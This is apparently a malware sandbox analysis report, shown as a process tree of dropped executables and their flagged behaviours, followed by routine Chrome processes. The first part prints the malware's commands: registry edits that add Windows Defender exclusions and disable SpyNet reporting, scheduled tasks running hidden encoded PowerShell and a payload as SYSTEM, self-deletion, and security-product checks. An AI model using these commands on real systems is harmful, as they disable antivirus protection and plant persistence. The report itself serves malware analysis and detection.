- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\HqsgV3FhkOM4dbBi7zF2KTgl.exe"C:\Users\Admin\Pictures\Adobe Films\HqsgV3FhkOM4dbBi7zF2KTgl.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS35FD.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS56D3.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPTyEJTVr" /SC once /ST 05:23:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPTyEJTVr"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPTyEJTVr"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnHoQpKIlSSCUFQrDN" /SC once /ST 10:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\axAcyKw.exe\" Sk /site_id 525403 /S" /V1 /F9⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\YOsUvWaaOc1lp6ZT7o7R18Kc.exe"C:\Users\Admin\Pictures\Adobe Films\YOsUvWaaOc1lp6ZT7o7R18Kc.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\G1JrzcFsM9hGnpHqtVY3dd42.exe"C:\Users\Admin\Pictures\Adobe Films\G1JrzcFsM9hGnpHqtVY3dd42.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\RGGojHFsgXQzdv8bcOkUGB5G.exe"C:\Users\Admin\Pictures\Adobe Films\RGGojHFsgXQzdv8bcOkUGB5G.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\sOxw8_KjNCeKKP7GsBVC_4W_.exe"C:\Users\Admin\Pictures\Adobe Films\sOxw8_KjNCeKKP7GsBVC_4W_.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im sOxw8_KjNCeKKP7GsBVC_4W_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\sOxw8_KjNCeKKP7GsBVC_4W_.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sOxw8_KjNCeKKP7GsBVC_4W_.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\WaYnBtaz6iKflAOM5ysOyNdb.exe"C:\Users\Admin\Pictures\Adobe Films\WaYnBtaz6iKflAOM5ysOyNdb.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im WaYnBtaz6iKflAOM5ysOyNdb.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\WaYnBtaz6iKflAOM5ysOyNdb.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im WaYnBtaz6iKflAOM5ysOyNdb.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\0FCnF0_BrlJLT75NotEsPxCa.exe"C:\Users\Admin\Pictures\Adobe Films\0FCnF0_BrlJLT75NotEsPxCa.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\RHRs9VMwETkZvTToe0k1cTSQ.exe"C:\Users\Admin\Pictures\Adobe Films\RHRs9VMwETkZvTToe0k1cTSQ.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 4207⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 4127⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\x4mMOg_SIxFonkT0OxE9NUri.exe"C:\Users\Admin\Pictures\Adobe Films\x4mMOg_SIxFonkT0OxE9NUri.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\oP2NjXBuWFyg8x_0VwbXQgHO.exe"C:\Users\Admin\Pictures\Adobe Films\oP2NjXBuWFyg8x_0VwbXQgHO.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 4207⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 4407⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\JCkKI7xFmN9wv_f98o0FGT3Y.exe"C:\Users\Admin\Pictures\Adobe Films\JCkKI7xFmN9wv_f98o0FGT3Y.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 4207⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 3927⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\9GWTG8i3nvtupPZ2ra_TrlSA.exe"C:\Users\Admin\Pictures\Adobe Films\9GWTG8i3nvtupPZ2ra_TrlSA.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\9GWTG8i3nvtupPZ2ra_TrlSA.exe"C:\Users\Admin\Pictures\Adobe Films\9GWTG8i3nvtupPZ2ra_TrlSA.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\w3y2anFddwj_osJ0_lEoC7IY.exe"C:\Users\Admin\Pictures\Adobe Films\w3y2anFddwj_osJ0_lEoC7IY.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pifSta.exe.pif V9⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\kYMwQ32OKq7zQnxXp7BrDlts.exe"C:\Users\Admin\Pictures\Adobe Films\kYMwQ32OKq7zQnxXp7BrDlts.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 4207⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 4407⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\rs1_VJVIP8DPEax9kGMC96Hw.exe"C:\Users\Admin\Pictures\Adobe Films\rs1_VJVIP8DPEax9kGMC96Hw.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\BS85BzMFmH8ttJ0hIjWHHRny.exe"C:\Users\Admin\Pictures\Adobe Films\BS85BzMFmH8ttJ0hIjWHHRny.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\BS85BzMFmH8ttJ0hIjWHHRny.exe"C:\Users\Admin\Pictures\Adobe Films\BS85BzMFmH8ttJ0hIjWHHRny.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\BS85BzMFmH8ttJ0hIjWHHRny.exe"C:\Users\Admin\Pictures\Adobe Films\BS85BzMFmH8ttJ0hIjWHHRny.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\d6_lGGWP0LYZvWwnyF9tqrMq.exe"C:\Users\Admin\Pictures\Adobe Films\d6_lGGWP0LYZvWwnyF9tqrMq.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 457⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 458⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Rkeagtomax1.exe"C:\Users\Admin\AppData\Local\Temp\Rkeagtomax1.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Users\Admin\Pictures\Adobe Films\cQdeLdrx5kSWNSFlBqtDrl0D.exe"C:\Users\Admin\Pictures\Adobe Films\cQdeLdrx5kSWNSFlBqtDrl0D.exe"6⤵
-
C:\Windows\syswow64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#617⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02976fcdf1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02976fcdf1.exeTue02976fcdf1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue028a363eda.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02522f9ea0b1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02522f9ea0b1.exeTue02522f9ea0b1.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 5684⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue026e94a5005f8.exeTue026e94a5005f8.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue026e94a5005f8.exeC:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue026e94a5005f8.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue028a363eda.exeTue028a363eda.exe1⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff947634f50,0x7ff947634f60,0x7ff947634f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,5620518344911793961,3589168534781088459,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1668 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,5620518344911793961,3589168534781088459,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1620 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff947634f50,0x7ff947634f60,0x7ff947634f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,7911229347558226790,6884649859995010553,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1708 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1504,7911229347558226790,6884649859995010553,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1520 /prefetch:22⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff947634f50,0x7ff947634f60,0x7ff947634f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1824 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2508 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1896 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1884 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4660 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4688 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4792 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4888 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4144 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5048 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1332 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1624 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1840,8271076431099290405,9421787876289714045,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=768 /prefetch:12⤵
-
